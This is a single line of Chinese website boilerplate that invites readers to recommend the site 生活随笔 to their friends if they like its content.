如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。